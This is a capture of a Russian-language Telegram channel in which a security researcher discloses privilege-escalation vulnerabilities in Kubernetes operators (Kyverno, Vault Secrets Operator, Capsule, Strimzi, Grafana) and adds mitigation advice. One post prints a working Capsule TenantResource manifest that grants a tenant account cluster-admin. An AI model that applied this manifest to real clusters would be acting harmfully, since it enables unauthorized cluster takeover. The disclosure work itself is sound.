TGViewer
Channel Public Channel
Defensive acceleration

Defensive acceleration

@cybersec_dacc

d/acc in cybersecurity.
k8s, appsec, ai/ml infra, linux.
ai notkilleveryoneism.

https://cherez0ff.art/

Contact: @cherez0ff
Subscribers
104
Photos
0
Videos
0
Links
5
Recent Posts 8 shown
Post #12 277
AGI таймлайны всё ближе, а remediation таймлайны остаются старыми. Спустя почти три месяца после отправки информации об уязвимости в Kyverno - самом популярном security-admission-controller'е для Kubernetes - наконец вышел патч найденного мной крита. Эскалация до кластер-админа через Policy ресурс, обходом валидации url-пути старым добрым url encoding.

Вообще-то я сообщил о двух уязвимостях: вторая позволяет читать cluster-wide ресурсы через Policy, но она ещё не исправлена. А пока писал пост, я (ну, точнее, мой Claude-харнесс) нашёл байпасс для вышедшего патча. Детали байпасса будут после публикации нового исправления.

Если у вас Kyverno: заблокируйте с помощью политики kyverno создание ... политик kyverno (namespace-scoped). Ну и не выдавайте права пользователям на создание этого ресурса, конечно.

https://cherez0ff.art/blog/kyverno-policy-apicall-urlpath-traversal/
  • 🔥 3
Post #11 292
Новый день - новый способ заставить оператор Kubernetes слить пользователю свой собственный привилегированный SA токен. В этот раз дыра в HashiCorp Vault Secrets Operator, CVE-2026-8715. Эскалация до кластер-админа: https://cherez0ff.art/blog/vault-secrets-operator-secretidpath-token-theft/
Artem Cherezov The Vault Secrets Operator sends its own secret with access to every Secret New day, new way to make an operator send a user its own privileged ServiceAccount token. This time it's HashiCorp's Vault Secrets Operator. The stolen token reads and writes Secrets across every namespace in the cluster, and creates serviceaccounts/token…
  • 🔥 2
Post #10 247
https://cherez0ff.art/blog/capsule-tenantresource-cluster-admin-escalation/

История о том, как разработчики Capsule (projectcapsule) дали пользователям возможность создавать и читать любой кластерный ресурс и отказывались признавать, что это уязвимость. Частично исправили через месяц после моего отчёта, заблокировав меня и мой отчёт. Уязвимость чтения кластерных ресурсов по-прежнему не закрыта.

Самый тривиальный способ эскалации до кластер-админа из всех, что я видел:
apiVersion: capsule.clastix.io/v1beta2
kind: TenantResource
metadata:
name: pwn
namespace: alice-ns
spec:
resyncPeriod: 10s
resources:
- rawItems:
- apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: pwn-alice-cluster-admin
subjects:
- kind: ServiceAccount
name: alice
namespace: tenant-bootstrap
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
Artem Cherezov "Delusional": how Capsule's developers failed to triage two cluster-admin escalations A namespace-scoped tenant grants itself cluster-admin on a default Capsule install, two different ways, plus reads any cluster-scoped object a third way. The developers called the report delusional and blocked me. Seven versions later they patched two of…
  • 🔥 3
Post #8 203
Уязвимость в Strimzi Operator: создав объект Kafka в любом неймспейсе, можно прочитать все Secrets в ванильном k8s-кластере. А в OpenShift - гарантированно получить кластер-админа.

Помимо описания самой уязвимости, добавил заметку про defense in depth для такого класса атак на кластер.

https://cherez0ff.art/blog/strimzi-operator-cross-namespace-rolebinding/
Artem Cherezov Cluster-wide secret read via the Strimzi operator with a cross-namespace RoleBinding A namespaced attacker creates a Kafka object and reads every Secret in every namespace, by making the Strimzi operator plant a Role and RoleBinding.
  • 🔥 1
Post #7 167
Нашёл уязвимость в Grafana Operator, позволяющую угнать k8s-кластер, забрав привилегированный токен оператора через дыру в кастомных ресурсах GrafanaDashboard и GrafanaLibraryPanel.

Этот крит был оценён разработчиками Grafana как Medium по причине «админ всего кубера - не админ оператора» (что?), так что многие ИБ/платформенные команды её пропустят.

Уязвимы версии до v5.24.0

https://cherez0ff.art/blog/grafana-operator-jsonnet-token-theft/
Artem Cherezov Medium rare: serving cluster-admin via Grafana operator Any tenant with create GrafanaDashboard or GrafanaLibraryPanel access can read the Grafana operator's ServiceAccount token, which has effectively cluster-admin privilege. Grafana rated it Medium.
  • ❤ 1
Post #3 136
d/acc - это подход к будущему, основанный на избирательном ускорении технического прогресса: приоритет отдаётся технологиям защиты над технологиями нападения. Сделать щит сильнее меча.

Философия видит в сверхразумном ИИ одновременно потрясающую возможность для расцвета человечества и смертельную угрозу для него: искусственные пандемии, кибератаки на критическую инфраструктуру, манипуляция и подрыв доверия в обществе, цифровая диктатура, необратимая потеря людьми контроля над собственным будущим.

Наша общая задача - направить будущее к первому сценарию и увести от второго.

На этом канале я буду писать о своём маленьком вкладе в общее дело - результаты моих исследований безопасности, мысли и заметки.
  • 🔥 2
Post #2
Channel photo updated
Post #1
Channel created

About this channel

How can I read @cybersec_dacc without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Defensive acceleration: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Defensive acceleration have?
Defensive acceleration (@cybersec_dacc) has 104 subscribers on Telegram, refreshed roughly every 30 minutes.
Does Defensive acceleration know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →